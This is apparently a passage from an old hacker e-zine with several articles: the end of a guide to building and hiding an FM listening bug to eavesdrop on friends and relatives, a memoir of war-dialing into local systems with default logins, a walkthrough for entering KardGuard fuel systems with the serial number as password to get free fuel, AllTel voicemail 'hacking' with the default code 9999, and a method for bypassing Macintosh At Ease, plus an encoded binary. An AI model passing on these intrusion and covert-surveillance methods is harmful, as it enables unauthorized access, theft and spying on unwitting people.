+enter the hole at the end of the microphone and move the diaphragm. The
+diaphragm is a thin piece of metalised plastic and is charged during
+manufacture. Some of these vibrations pass down a lead which touches it
+to and into a FET transistor. A FET transistor has a very high input
+impedance and does not have a loading effect on the charges. The audio
+then gets passed through a BC 547 transistor which amplifies the sound
+around seventy times. The BC547 then passes it to the base of the
+oscillator stage.
+
+2.THE OSCILLATOR STAGE
+
+        The 47k resistor picks up the pulse from the transistor and then
+turns the second or oscillator transistor ON, but the 47k resistor has a
+value so that it will not turn the transistor on fully. So the feedback
+pulse from the 10p capacitor turns it ON fully.
+
+        Normally a transistor is turned ON/OFF via the base, however it
+can be also done by holding the base firm and differing the emitter
+voltage. In the FM bug this is whats done, the 1p capacitor holds the
+base firm and the 10p feedback capacitor differs the emitter voltage.
+However for a capacitor to do this the emitter must have a DC voltage
+that can be increased and decreased. The DC voltage is about 2V and the
+base will be 0.6V higher than this so the base voltage is fixed at 2.6V
+by the 1p capacitor. The voltage does not rise or fall when the
+oscillator is operating only when the audio is injected into the base
+via the 100n capacitor. This is how the circuit works and continues like
+this at a rate of about 100 million times per second.
+
+        The oscillator is designed to operate at around 100mhz, however
+this figure is dependent on a lot of factors such as the 6 turn coil,
+the 10p capacitor and 470R and 47k resistors also and the figure of
+operation is about 90mhz (my FM bug operated at 88.5mhz). 
+
+
+GETTING THE BUG READY FOR ACTION
+
+        Ok so you have built the bug now and are ready to use it. Well
+first of all you will need some sort of FM radio. Alright put the bug
+next to or near the radio's antenna. Turn the bug and the radio on.
+Alright starting from the bottom end of the radio's FM scale. Slowly
+progress your way through the FM band. Usually your bug will tend to be
+around the 85-95mhz range. Once you hear a beep (because your bug is
+close to the radio) or any other strange static noise stop. Alright you
+might have been lucky and your bug is exactly tuned already, however in
+most cases you will need to adjust your bug slightly. Using a small
+screwdriver slowly turn the air trimmer, whilst doing this babble out
+some words, stop turning until the echo of your voice through the radio
+becomes crystal clear. Your bug is now tuned and you are ready to put it
+to use.
+
+        You might have some problems with your bugs frequency being
+exactly same as a radio stations. No problem, by compressing or
+uncompressing the coil you can change your bugs frequency. Use the coil
+method if your bug is in the middle of a few radio stations frequencies,
+if you just need to move it up or down one or two mhz then use the air
+trimmer. 
+
+
+PUTTING THE BUG TO USE
+
+        Many of you already have your ideas on how to use the bug.
+Remember it might be illegal in your Country/State/city to use this bug
+in the way you intend. Hey its up to you I dont mind, however I take no
+responsibility if you get in trouble.
+
+        Anyway here are a few "friendly methods":
+	  
+        1. CHRISTMAS. Yes it will soon be that time of year again, and
+this time also brings a great opportunity to discover some of those
+family secrets or maybe even find out what lame presents those relatives
+have brought you and save you from the disappointed face they will see
+when you open it.
+
+        Okay put the bug either in the pot the tree is standing in or
+fasten it to a branch relatively close to the bottom of the tree. We
+place it at the bottom of the tree because the antenna needs to be
+extended if we want really cool range. Okay put the bug in its position
+and then unravel the wire all over the tree.
+
+        2. TV listening. Okay if you are out in the backyard whether it
+because you want to, or there is some chore that needs to be done. You
+can listen to a favorite TV show, or a basketball game or such. I know
+your saying why not listen to the radio, well you now have a choice of
+listening to a radio station or one of the 10000000 TV channels your
+state offers you.
+
+        Set the bug up about 3-5m away from the TV, then adjust the TV
+volume so that it is just right to hear on your radio.
+
+        3. Bug-a-friend. Okay you can bug your friend to see what he/she
+is up to. Okay you will need to know where your friend goes and then
+previously go there and set up the bug and your listening point. Make
+sure that you set up a place where conversation happens, it is very
+boring listening to insects and such.
+
+        Conceal the bug anywhere within a 3-5m radius of where your
+friend talks and stuff. Now conceal yourself and then sit back and
+listen.
+
+        Now there are a few of the more "legally friendly" methods,
+there are thousands more not-so-friendly and even malicious
+methods <Oooooooo> that I will leave up to your imagination.
+
+
+CONCLUSION
+
+I hope the information contained can help you successfully build a bug,
+and then good luck using it. If you have trouble just e-mail me. If you
+can not get hold of some of the components, you can order them through
+me. Also if you want a bug, but dont have the electronic skill to do it,
+you can buy pre-built bugs through me.. just e-mail me. may the force be
+with you
+
+                        Obi-1.
+
+------------------------------------------------------------------------------
+
+My short time as a hacker.
+
+by Kwoody
+  
+  I live in a small town in northern British Columbia where the city
+  owns the phone company. All of BC is serviced by BCTel, except here in
+  Prince Rupert. The phone company used, up until 1991, mechanical
+  switches, no lie! Tech dating back to the 50's sometime. I know this
+  because I know some of the workers of CityTel. (The name of the phone
+  company). Because of this they were not able to offer all the goodies
+  like Caller ID, Call Forward etc...and it was easy to hack then, not
+  the phone company, but all the other systems in this small town of
+  16000+ people.
+  
+  I got into hacking sort of accidently. I have had a computer and modem
+  of one kind or other since about 1983. I moved here after high school
+  in 1986 and found a good paying job I have worked at for the last 8
+  years. One night night in 1990 I was sitting around with my roommate
+  having a few beers and decided to call a buddy of ours to come over
+  but I dialed the number wrong and got a computer tone. Cool I
+  thought... I knew the numbers of the 2 local BBS's and that wasnt one
+  of them.
+  
+  I fired up the computer and called it again. I got the prompt: 
+   Xenix 386 Login:. 
+  
+  I had some knowledge of other OS's and knew this was some kind of Unix
+  box. A friend of my roomie was going to university (UBC) and he
+  happened to phone that night. I chatted with him for a bit and told
+  him what I had found. He told me to try sysadm or root. I got in with
+  sysadm, no password!
+  
+  I found that I had complete control of the system and it belonged to
+  the local school board. I bought a book on Unix and learned as much as
+  I could about the system and Unix in general. I guess being a rookie
+  (read lamer?) and not knowing shit about how to cover my tracks they
+  discovered the system had been hacked and shut down the dial-in. They
+  went back online a few weeks later and left sysadm wide open no
+  password again. I could not believe it! Even after being hacked they
+  still left their system open like that.
+  
+  By now I was hooked and I wanted to see if there were any other
+  systems in town. I could program a little in Pascal and basic (lame)
+  and tried to write a dialer of some kind. No go...so instead I figured
+  out the script language of Q-modem and wrote a 40 line script that
+  worked. It dialed all numbers sequentially but I did not worry too
+  much about being caught since the switch they used was so ancient
+  because they didnt have caller ID or anything like that yet.
+  
+  I did not know at this time of the hacker community and some of the
+  programs available that would do this already. And even if I did I
+  wouldnt have known where to call and get them. At any rate I had two
+  computers an XT and a 386 both with modems and two phone lines, one I
+  used as my normal voice line and one for data. I setup the dialer on
+  both and away I went. By the time I had finished scanning both the
+  prefixes, 624 and 627, I found about 30 computers. Of those I was able
+  to get into about 10. All of them used defaults and all except the one
+  below were Unix boxes.
+  
+  Although I did find one number that connected at 1200 I think it
+  belonged to the phone company. After I was connected nothing would
+  happen. I tried for a while to get a prompt of some kind then suddenly
+  a line of text appeared that listed two phone numbers and some other
+  stuff that I cant remember. So I just left it alone for a while to see
+  what came up. It soon became clear that the numbers in one column were
+  always one of 4 numbers. RCMP, Fire Dept, Battered Womens Shelter and
+  a second RCMP detachment. It looked like it recorded all calls coming
+  into those 4 places.
+
+  One hack I did was on a system that dispensed fuel. It was called a
+  KardGuard 3000C. I knew of two places in town that had these systems.
+  One was where I worked and the other was our competitor. And since I
+  knew how it worked it was easy to get in. I saw their volume of fuel
+  dispensed and such and could have done really nasty things like erase
+  their transaction buffer or get free fuel from them. But I didnt since
+  I did not see the point in hurting them or their system even if they
+  were our competitor.
+  
+  For those of you who might find such a system I'll give a brief run
+  down on it. The hardware is limited to 300 bps 7E1 and consists of a
+  few things.
+  
+  You can tell the system as it announces it when you connect: 
+  
+  KardGuard 3000C Motor Fuel Dispensing System. 
+  PASSWORD: 
+  
+  The system uses punch coded cards read by a card-reader. You have a 4
+  digit security code that you need to activate the pump to dispense
+  fuel. Everything is kept track of by a computer that reads the amount
+  of fuel pumped, date, card number and a few other things depending on
+  how the card is coded. Like odometer reading or car number.
+
+  Now to get into this system via dial-in all you have to know is the
+  Serial Number of the system. All of these type systems use the serial
+  number as the default password to access it via dial-up. And its easy
+  to get the serial number. If you know the location of the card-reader
+  go and look on the side of it. Generally the actual card reader is
+  housed in a metal box. On the side of the card reader itself near the
+  back is a small sticker and the serial number will be written on the
+  sticker. That was how I did it. I just went to their card reader and
+  took the serial number off it and got in.
+
+  Once in you can do any number of things. Shut off the pumps or
+  manually activate them without a card and get free fuel, see how much
+  of any product was dispensed. Products range from 0-15. 0 being
+  regular gas, 1 regular unleaded etc. It is fairly limited of what you
+  can do but you can do some nasty stuff to the company who owns it if
+  you know how. A note to this all commands must be UPPERCASE. And all
+  commands are one letter. Like E is for looking up the 4 digit code for
+  individual cards. I dont remember all of them as we upgraded to the
+  latest version of the KardGuard which supports up to 14.4k and is a
+  faster system.
+
+  After about 3 months of this sort of stuff I was at work one Saturday
+  and got a phone call from a Constable Burke of the RCMP Special
+  Investigation Unit.
+  
+  He informed me that he knew about my hacking and would like to take a
+  look at my computers. I told him that I didnt know what he was talking
+  about, he just said we could do this the hard way and he could get a
+  warrant to search the place. He wanted to meet me at my place in 10
+  minutes. I said ok. I was shitting bricks by this time. I phoned my
+  roomie and told him to get all printouts and disks out of the house
+  and take them away...anywhere. I took off home and got there to find
+  my roomie gone with all printouts and disks. I fired up the computers
+  and formatted both HD's. Formatting a hard drive had never taken so
+  long before!!
+
+  I waited for like an hour...no sign of the cops. My roomie came back
+  and said where are the cops? I dont know I told him. I waited some
+  more still no sign of them. I got a call about 3 hours later from a
+  friend of my roomie and he asked if Constable Burke had showed up. I
+  asked how he knew about that and all he did was laugh his ass off! Now
+  I was thinking joke...bad joke...and it was. I managed to find out
+  that this "friend" had gotten someone to pose as a police officer and
+  call me to see my computers regarding hacking. Well the guy he got to
+  pose as a cop did a good job at fooling me. I guess I was just over
+  paranoid by this time. Plus I was really pissed as I lost a lot of
+  info that I had acquired over the previous months when I formatted my
+  hard drives.
+  
+  I guess my roommate had been telling a few people about what I was
+  doing. I was more than a little pissed off at him as I had not told a
+  soul of what I was doing since I knew it was illegal as hell. I got my
+  disks back and burned the printouts and laid off the hacking for a few
+  weeks. I started up again and was a tad more careful. I didnt keep any
+  printouts and kept the info on disk to a minimum.
+  
+  Then about a month later my roommate, who worked for our landlord,
+  came home one day and said that our landlord had been approached by
+  some RCMP officer regarding me and my computers and what I might be
+  doing with them. I said is this another joke? No he said, go talk to
+  him yourself. I did but he wouldnt tell me much except that something
+  was definitely going on regarding me, my phones and my computers. And
+  the RCMP were involved.
+  
+  After asking around I found out that quite a few people knew what I
+  had been up too. All they knew is that I was some guy who had been
+  cracking systems in town. But word had spread and I still dont know
+  how the cops found out or how much they knew.
+  
+  But after talking to my landlord I quit right there and then. I went
+  home formatted the drives again, all floppies and got rid of
+  everything. I had hacked my way through everything in town that I
+  could in about 6 months. Also by this time CityTel had upgraded their
+  switch to some of the latest tech and had Caller-ID installed along
+  with all the other goodies you can get these days. It was definitely
+  time to quit.
+  
+  Not long after I started a BBS that I still run to this day. I figured
+  that was a way to kill the hacking urge and be legit. I dont live with
+  that roommate anymore. I'm married now and still think about it now
+  and again but have too much to lose if I do and get caught.
+  
+  On another note about 3 months ago I was at work and dialed a wrong
+  number. As fate would have it I got a blast of modem tone in my ear.
+  My old hacker curiosity came alive and I made note of the number. We
+  have a small lan at work that has a modem attached and when I had a
+  free moment I dialed the number up. I got the banner:
+
+  city telephones. No unauthorized use. 
+
+  xxxxxxx <----a bunch of numbers
+  username: 
+
+  I hung up right there but it was interesting to see that I had found
+  CityTel's switch or something of that nature.
+  
+  To this day I dont know if there were any other hackers in this small
+  city where I live. As far as I know I was the only one that did any of
+  this sort of thing. It was fun but near the end I could feel the noose
+  around my neck. And I quit while the quitting was good.
+  
+  Today I help admin our small lan at work with 2 servers and 8
+  workstations and the Unix I learned hacking helped me when my boss
+  first started to get serious about computerizing the business. Since
+  then I have been able to help setup and maintain the systems we have
+  today.
+  
+  I'll give the specs on our new KardGuard if anyone is interested as I
+  know they come from the States and there must be more than a few out
+  there.
+  
+  kwoody
+
+------------------------------------------------------------------------------
+
+                          USING ALLTEL VMBs
+
+                          By Leper Messiah
+Ok. This is everything you need to know in hacking AllTel Mobile's
+Voice Mail.  The default password on all their boxes is 9999.
+Here are the docs, word for word.  Enjoy!
+
+-----------------------------------------------------------------------------
+
+Features
+-=Basic=-
+Accessing your mailbox
+Changing your security code
+Recording your name
+Recording a personal greeting
+Playing a message
+Recovering deleted messages
+Playback mode options
+
+-=Enhanced=-
+All of the Basic Features plus...
+Setting up your greeting schedule
+Replying to a message
+Redirecting a message
+Recording and sending a message
+Creating a broadcast list
+Personal greeting schedule
+
+At a glance
+
+VOICE MAIL SET UP                    Press
+
+To change your security code        8 2 3
+To record your name response        2 3 3
+To record your personal greeting    2 2 3
+To edit a greeting in your schedule 2 2 7
+To activate your greeting schedule  2 2 8
+To change your playback mode        8 8 3
+
+SENDING AND RECEIVING MESSAGES
+
+To play a message                   1
+To save and play the next message   2
+To reply to a message               3
+To redirect a message               7
+To create and send a message        3
+
+Accessing your Voice Mail
+
+1.  Access your Voice Mail.
+    From a cellular phone press
+    # 9 9 Send.
+    From a landline phone dial your
+    cellular phone number, which will
+    automatically transfer to your voice
+    mail and press # when greeting begins.
+
+2.  Enter your security code.
+
+Creating/Changing your security code
+
+1.  Access your Voice Mail.
+2.  Press 8 for Personal Options.
+3.  Press 2 3 to change your security code.
+        * Note: Your security code can contain 1 to 7 digits.
+
+Recording your name
+
+1.  Access your Voice Mail.
+2.  Press 2 for your Greeting Menu.
+3.  Press 3 3 to record your name.
+4.  Record your name, finish by pressing #.
+    Options
+    Press 3 1 to play your name.
+    Press 3 3 to erase and re-record your name.
+
+Recording a personal greeting
+
+1.  Access your Voice Mail.
+2.  Press 2 for Greeting Menu.
+3.  Press 2 1 to play your greeting.
+4.  Press 2 3 to record your greeting,
+    record your greeting, finish by pressing #.
+
+Playing a message
+
+1.  Access your Voice Mail.
+2.  Press 1 to play your messages.
+3.  Message will play.
+    Options
+    Press 1 to keep this message
+    as new and play the next.
+    Press 2 to save and play the
+    next message.
+    Press 3 to reply to a message.
+    Press 4 4 to replay a message.
+    Press 5 to erase a message.
+    Press 7 to redirect the message.
+
+Press 8 8 3 from the main
+menu to choose a playback mode.*
+Continue to press 8 3 until the
+desired playback mode is selected.
+
+        * Note: The system has three playback modes:
+        normal, automatic, and simplified.
+
+Recovering deleted messages
+
+To recover a message that has been deleted: **
+Press * 1 to go to the main menu,
+Press * 4 to recover all deleted messages.
+
+         ** Note: Deleted messages can only be recovered
+         before you exit the mailbox.
+
+Replying to a message
+From the Play Menu:
+
+1.  Press 3 during or after a message.
+2.  Record your reply finish by pressing #.
+3.  Press 3 to continue recording a voice message.
+    Press 5 to erase a message.
+    Press 7 to select a special delivery option.
+4.  Press 9 to address the message.
+    If sent from a subscriber's mailbox,
+    the reply with be automatic.  If not, enter
+    the mailbox number.
+
+Redirecting a message
+From the Play Menu:
+
+1.  Press 7 during or after a message.
+2.  Press 3 to continue recording a
+    voice message.
+    Press 5 to erase a voice comment.
+    Press 7 to select a special delivery
+    option.
+    Press 8 to play the original message.
+3.  Press 9 to address the redirected message.
+    Enter:
+    a. mailbox number
+    b. broadcast list number.
+
+Recording and sending a message
+
+1.  Access your Voice Mail.
+2.  Press 3 to record a message.
+3.  Record your message finish by
+    pressing #.
+      Press 3 to continue recording a
+      voice message.
+        Press 4 4 to review the
+          recorded message.
+        Press 5 to erase a message.
+        Press 7 to select a special
+        delivery option.
+          Press 1 to mark a message urgent.
+          Press 2 to mark a message confidential.
+          Press 3 to select notification of non-delivery.
+          Press 4 for future delivery.
+          Press 5 to delete special delivery tags.
+4.  Press 9 to address a message.
+    Enter:
+    mailbox number
+    broadcast list
+    0 + last name - 0 + first name
+
+Creating or editing a broadcast list
+
+1.  Access your Voice Mail.
+2.  Press 6 to access your broadcast list.
+3.  Press 3 to create or edit a broadcast list.
+4.  Enter a one- or two-digit broadcast
+    list number.  If new list, select any one-
+    or two- digit number.  If editing, enter
+    the one- or two- digit number assigned.
+5.  Enter all of the destinations.
+    Press # after each destination entry.
+    (destinations can be mailbox
+    number or broadcast list numbers.)
+6.  Press 7 3 to record a name for
+    your broadcast list.
+7.  Press # when finished.
+
+Setting up your greeting schedule.
+
+1.  Press 2 from main menu.
+2.  Press 2 6 to select your active greeting.
+3.  Enter the greeting number you want active.
+4.  Press 2 7 to edit a greeting.
+5.  Enter the greeting number to be edited.
+     Press 1 to play the current greeting.
+     Press 3 to record a greeting.
+     Press 5 to erase the greeting.
+     Press 7 to change the time
+     interval for this greeting.
+     Press 8 to review the time interval
+     for greeting.
+6.  Press 2 8 to activate/deactivate
+    your greeting schedule.
+
+Message waiting notification
+
+1.  Press 8 for Personal Options menu.
+2.  Press 6 for Notification Options.
+3.  Press 1 to play notification telephone number.
+    Options
+         Press 6 to enable/disable
+         message notification.
+
+AT ANY TIME DURING A MESSAGE             PRESS
+
+To rewind by 6 seconds                   4
+To rewind to the beginning of a message  4 4
+To fast forward by 6 seconds             6
+To fast forward to the end               6 6
+of the message
+To replay the date and time stamp        8 8
+To stop and function                     #
+To return to the main menu               * 1
+-----------------------------------------------------------------------------
+
+Good luck hacking.
+-- Leper Messiah
+
+-----------------------------------------------------------------------------
+
+Hacking At Ease for the Macintosh.................. By: Ace
+
+Introduction:
+
+        Some educational institutions and businesses use At Ease to
+discourage the pirating of programs and access to sensitive files, and
+generally screwing up any fun you would have!  Wouldn't it be nice to
+know how to be rid of it??
+
+How to:
+        Well, this will tell you how to remove the password for At Ease
+so you can gain access to the Finder, and also let you change the
+password to one of your chosing, really screwing some one up.
+
+        First off, the computer you will need a copy of Microsoft Word
+5.1 or 6.0  (Norton Utilities Disk Editor will also work,  and I'm
+trying my best to find other programs that will allow you to do this).
+Launch Microsoft Word and go to the "File" menu,  and select "Open".
+Now change the "File Type" to "All Files".  Navigate to the Preferences
+folder and open At Ease Preferences. It should look like a giant mess.
+Somewhere in there is the password.  It doesn't really matter where.
+Select all of the text with Command-A and press the delete key,  and
+save the now empty file.  Restart the computer.  Now you can select "Go
+to finder" from At Ease's menu.
+
+Other Programs:
+
+        You can also use the following program called DisEase. There is
+also a HyperCard stack that will bypass At Ease.  I have used them both,
+although I feel that using the above method is better.
+
+            ___
+          /  _  \
+         /  / \  \
+        /  /___\  \ce
+       /  _______  \
+      /  /       \  \
+
+
+(This file must be converted with BinHex 4.0)
+
+:#d4TFd9KFf8ZFfPd!&0*9%46593K!3!!!#iE!!!!!"Dd8dP8)3!"!!!Z'h*-BA8
+#r`!!!"Err`d!"d4TFd9KFf8!!kB8!0phS!!4QKS!!!#!!!!!!!$RQdl"G!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!rrrrrd&38%a&390&)3#SX5K#U,)ak!!!Ah8
+!!!!!!!!YP3!!!!"j!`!!!!!!!!!!E$d1!&h(r2bZe8l@f@95I#BhbSpfRTQlBe[
+GZRV*IQ9bSprES-Z&df[JCqmPT`0qRTYYSl9`F1ZHk'ffA-rG'BYZdmh@@Mc22B!
+l$RR#(H@AF$pG#19#YJrZK,aL9`cbK5mm9V&0&mVGP(YHjbP3A8F[Z9m'0cbI,(Q
+Jj1#41AcbN!$F3JD3!"')6q"h8PH-5Bba$`mcGJrH[PeSiT&&LDFRr84p'`Y1"`T
+H-XZcQpSAV@Z[edU,Si45[DkYBqA5Q[!%i(X6Pji[IrK2h%jY*r0,JZVrURhm)I@
+qG&NM4TfhhhBBFab8MT2Mj1"e831I@rZ*c4c'@MUhEVe8CEXkHc@(bj86S%Hrf3*
+rjKa@cE)V9cXCUl&Nh[Lqp1D+fXC%G*kcE'qcNdVel4TMFPE#fE3J-Ijj6&9JDM'
+ImQ&U!&1I5eGcj-m4HZ9cqB%2e6UCb[XU1cpPE`2c,BXHU'rTB!`-Kl3@PM0[%`X
+i)kK8Cf`HZ$K$U#UFi95,-p6U2pELR&R)H$f%HJce@EFHAXM5KdU+@3ja*E6HQiR
+Pam'bE9dMP!6$-HY3Vk%"imJ6M6Q%e9Y3&k!khCjU(YpEq9cfTV9lA'f@YL5hYA4
+`E8Vb#j[(pjANpqSPqCA2qDhL6rG'#QXV1bYA-jC66+jTr#hV8+#B69rDYj!!pGj
+49$[q#0ImNI6Q"EAMZphH&[3qZA!HIqqZI-jhSq$k@'TGbmDYpAI@lh#Y3%TP"1H
+FHBb02l'kcfE[6cJ1&#J!Ef"qdYjQEZKSHQ"G"pN@H+`#hS%[8CAN3(e@q9cZPk(
+TdbAPL)*ZG)p3PbC4IaV[ahSrC68Z,'IGm-6(hlH65H02eA!p2V1L[ReECpZ'qN9
+YEG[D`1iVl(#UQ4hZI5Yr(P"k'Qk`EPPBlMMNQ'Mcq*-P1GDKG0hlDXGheJ9l[c%
+jfpY+-aacC`0Mhih1'pqERf!jkaPl,RQHpIh`,CP9rN"N!r#kHqI#(`m"j5'ipI%
+YM2hqQN4MpHDX&BR0UqYb9L8f-rC`AG`k4(Lp(rSI(T1HAEZRVJ+6F-$i!I6ZF([
+$k-9)*HVhIVeZ$[!1Y$TpmmEr'AQimVQ-!B3!DRpG,["BR4qp64AcaTpUC*Q4bNl
+RV*2#qaKr[q'FGXj8VXi-Pq4E,FjB&)N#$ImF'[kBkhCX`Fk"!@HB9fGj0E*Jjk2
+h1ZFAl0bpfaRM9FBk"$IZXJkPYMY1lml#@UZapaR5)G@5'8Ph`2Zc5[,6l4bPqh"
+q8DdcC+hK#,,@l!ceh&U5MdNC$Xm!F4MDIURh-kQY,&!bcaNk2$29l!`I"S2HAHL
+FVh`Zkd[hlUR,KDrEJ$M@qpRm&LBjB`f$32KGcZFfMSZ8"2[fe(B@6Up(G90k3pd
+F9j&jQGFA3QPdahSA@ifmrLDPZm!85B8N[DZqTG0XEGf+U+,%j1l)hj),Cf5*h(%
+6MA!@0a(-"-i@hCq3!+6'i1BE9L5fA!Zfm',Qm4SS*hV1NCSpm-RmLcPDHpH1@Q,
+L*RlUCllCFeTBS,#&j6r%SQTMhCElILI4Q,0jlGV%jTUkk"qICR,$XT+mG(Y*AUq
+HfM,K&kiiCPbr6(ZJq&1pN6SG161AjA,2c#d[L'CY#5#Pj,TFfPfLcc2T)HRp5jL
+kl+Hcqk"*"m[re-S1E)Z3!,8$#abc[T)j6AZ$-e55rb'H"V`DiGAj$e%Q$(f)dZ!
+-ViBVJ0I)T$2D[-cT)dqcR!BQ[8(FZIY1TpXVjQ@HET`MNZ0`[TFC&iDdjXcT&$D
+TN[c$-r(1J@0QHM23mh2TJeCMqP(+#1`(mpP59%[Br[3KGf13!+6T5)L(A$C2%XZ
+D2BeCB(lfm#aJ202+![1!4,[%Pi"b9#3$9i1m-B3YDI(D2@jU#*Bl1-[Gll#%Jl0
+QZbc,rcG,hmR,,$F`UMiRVEh)-JrZrCTJHIl(rj8PI#6p*jlE2ClN0BRe2ZpjlI`
+M,[0E1229dYhT3eSq'1D8j00NqLaa5Mm+[ckEDXimRck,DJ$GiiF,h*QAq-b2d$f
+*Q@+ifmh1[DYD0f,$Ueh9dY(8XE9qBkR)Y*(8cl,C(GM!bl&[4jHBTc+I[bhR8pM
+$Si[08mkpa6Pld)0Z)`ZR4E2hEXml[*!!4DGP*D50U,1c%Z`T-C-qa"8fV%2B1B#
+'A2Ka5EQ'J`AD3+aE8YXPGRK48@hQ0&*[%Z29+aLp)F)3EKKpJ()*Q`T9"FX'f8R
+R0#Rjk@4E2C4Fdp5bFGZ$3X@KNQahhmm&,h",hfrG![A"%5lj5N8"FLm)(YqiiTU
+k"`LYYbd+V#2BqaYbd6Q2cYR'HbmcZ,%LZf(fVcNm*0AGGJQViBD+l-CVIqh5KpJ
+mm(@'V9Yk1i$c-($8Aq-)9Gl9X""Ek*'E@(ifNaU3!,dmNrbdNIYZUX0@a[[6H*p
+hiE!hm$k&pmrG$IeKE1L2)X%C1cl"lLA"M[fTUqil'I,I(5)B6$RN(3l[1)4M[H1
+3!%YBIqZ3!(G`,MY%+1$ZJ-8&2#IXECI6$UF[f!-2UpM2dhKr+IelVFkaj[%[,f5
+mqpR*1HV`@FUfcr)-AiqC,q0pQ%p64b"1cK$fiI4RLIZMLp[@0GF[j@G4QGG,XR(
+Zp'fF4$8l,r+6U1rbNkJrGBC4(A91SIUKFhVHcZD'M@h1kpJ+bpZE'PZJm1YJlLH
+PSq8j0kH[[D1JBNP$"mf[UhqJSk6mrXkQ$Tl01#AKQ6S8,Fp6ACaPY%8l3hLISQd
+$A8TCC'qdI-Ce,NBKa`!lfCqqePSM'%cd6SPHUe6A&Pe#*d'CebZIBdrQ,aPrBL*
+p*%SEeM142M,[laAR3jRAN6bRm4kF1KrLh2k4-bXZcTcNZrabL'afZ)H+HQf`)&T
+3)6Ak$bfZNlqiZ(Khj3mkC+efS9b5mj8h1eMPH@GBfmEm@JR,`4BaU09@9e8H)qI
+IA995[V*Q4B4frGiH(4ZmT@J&MEU@d+UMXf0dMR$Yea,VJkeXTGQB&CMpJlkkXi(
+!LN42FH9pB,'RmPM&G[Qa,AUdR1hpiQ)pKIU*3iZrr[h'J&kVe8B,5UEhl&fBB2l
++6Z+2D8P2e@Aj3RQba0!0[*CBQE$@,[qq-aE$CUpYPjmZfqPNQ*aIb"`f[G'U+'3
+j,4TQ(#CcTY%bC"Rem[60"RSi4kfld@VLL$+`!SdjQ2*M+JZeMmQBpHI2Cl*8dT)
+EQ#q9V%L%%LbEFjQC-jrjmr6'V""abXRI[Y#4(eX[ZY-$mq@Ec221Kf2B*BjSDrU
+GX49QQFPb+qE,Rpdb1cKIZJ!*VmQAX(2N3VIMS8dXQmdSfbi(f-b+lEkcc6DBc`4
+kZG@i(1KD9HRfh,9XGQ[1Nh804ZNQ&QIA2TRGF%0i%lZ(4F-l&keBHLHlX9A#G&E
+C*RBYQeReeka,@kVAhPYear-rIk6b"cL9IK(E[53fZiG`AYEc@bZ@j#pKdj[2pQa
+!RMbAENPRHS1pdGi"*-T(N!!l1,[@#RTLk@UJ"Gac3cUh[EpQ$dHHe[ac#qGYf*p
+ZAl#6&BirLFl1pbA'HrMH1TG[iR,[mpJqRqAEjeIBNhc'afHq`8r(-)20k6DDmjh
+k&CE[c5YBl[RD6CJk2S@%ma@D1HNKdBB($3f@LqTHCY&j3qBPp1Vja"qk%`1YqFH
+D-pr''6A9ck-H4[fL@q1NND2mL%pred9jbChq8lIq2U(Jp1ECRPY4IB0AahPeXZG
+@D0'&pm2&a@,6rZ65PUD1TR9EQlSSHhYaAXV2+ri%fQ&,%GV4b4ek(k#kT0aHXAT
+&ledF4q)iTcb0-Aq+F(Tr'bI$iY3Ufi,hm(k'YVE-9rQ')2%cNUq`IGK2F$kre3m
+rhe"5RUj$'Mc(@QpLlfYa4M02SaV*2,0f6b"El(Tlee3Z@YUqY"N(JmdipklIk*l
+BJH1KN[)epU,&#mYPeYXcVaERpP$ZMS,m*3j1lMMc)h9qU("%-2R%QNe0'cB4iL3
+$1TNX+'Cjd1@6a#"DRRlL#iZr1ZL-VIkHRHeTm*QDYR@YjJ2VQVDZ@mm2(TR-cr2
+arTbe2EIL$ip#33-Ee`j+Ua5fK03DE'D5IV[cDZ@r$$#YQ@fYh0XlI2HHN[*l&Uf
+SJNipaKVUfQD059eYM9DYEjqHBkbSQaPlT5%hGN1GE&e2QIZYrSE"hLrfIT'MV9L
+%hBr3HQl@UPp,'$2UXQ+cr``-XAf-p(i4'dTYE(CmpT'eb2Vc&9CMTR*)'h0R(Vm
+iFpkGX9TbpjV0@FF5jK$1K3)dbaJf,(q*bI`k0Uf5@QMj-`U`19,+HZNlKH`f+EA
+SqrrQ4hE+XUbq&iip[1bRV&`[!20h88Ya2XiqMrP2rphm6Nhk"i5jrc#I2mQJSR[
+cM4@l0ZIEhIBZ6'US1QhD@UrP%jfBcH@6@CMU,1DlaGHk0f6TV*99GKjjG(eqp`Z
+T4)aCL95LX[0VMkkrSCMhD#Uej!k@@[,B#p(Xe**BGQ8R1H+ehDpp!LJMh5rd24V
+c[GKAl%XY1GUA@[,$4qYcpMfmhNqF9bEUAUqNBqBH[)mJ14j"[4G[MIRj1H)3fqI
+@iPaaL$hReMm@Y83RpP62GHY+Yfi4Y9`SD[mh8FZp3p05SXlqT+Mcbphk@9&,Bfj
+p305-SIC4cA*c6V)Xe26'dETh1BKm3Jqr)M9e,@VLqT!!1mrB,*`6apM6NSeYeB2
+MGkPQXd*@+-ACN!!f0CJET4$Y[R)e+KYLj1#H8J$86rSF"`$5%b-,hqVa*kBr-ec
+lCPUY[[A+QqCS2Zf[RTiHAXjlK%P[`UHh+p+[RfbcZRSCK%D,Uh2M)R2P)QSZAN%
+,!kQd0&NC%4fm%p3Sk$[jXFa(-miEhh[MHaRRYHm-rM6cd@k`p%J9p!PMA(RFmAG
+eCc01R$L"%K8pVq*pR0H$Jlr!Hr$%kB(6,jmHQ+TrJIIJL3(8!e3lU*h"9`HGFE`
+c*dkm6"51!TSr[j,GFr6I2k2LQ@LZlYV4Y@1('"TcKeGe6I6(k0Qa@Y68[qfffmC
+@V4,eIqPhG8hdrk+SU)Mk[%ErP5,('H[D)HUadI(aF9LSUd[8Bk0GA9fVGU!J99D
+Y%U3[2[p0hPpj3(,kN!"a5'J@B#2XQUXMj-qlr(h15CEY$,R4Hc@"jcH-*bmkrY0
+$kFAcbhe1$*`B1(lmf-6imCF(AXEM$TmiMZ'"P`FSi5MMMJr300i$aemq-A"8M#(
+94(f8jJF'MJi-L2VSmH18D%G2[#aUc*mH'1LMH9krH[a5rmVmZhKZrf@h"Mm5M[U
+m"Kr1'h`prTrQr41L4Vpm`(')$kr4[ichjiF22q1-RcJKkU-RALAGIJ(PH3fpi39
+5'Li"*)K"mCH4hc!)pEd-rpXXrlm2PUfV46cZ5M'jFe`HAleU94HpmAX2J)q[S[F
+1r0i"%*X+(ke#bB%ZNX8ZX30MH(CJ%0-##'5`AD!l0V(Pd%-F,r@"2iUGaAf`iQ$
+*QHS$Ia3EMAL+X#+Y@Mh9VaSEhB%qYL!mc-1Il+m@q*2c9DZUhZPcrT0pN[LGrYJ
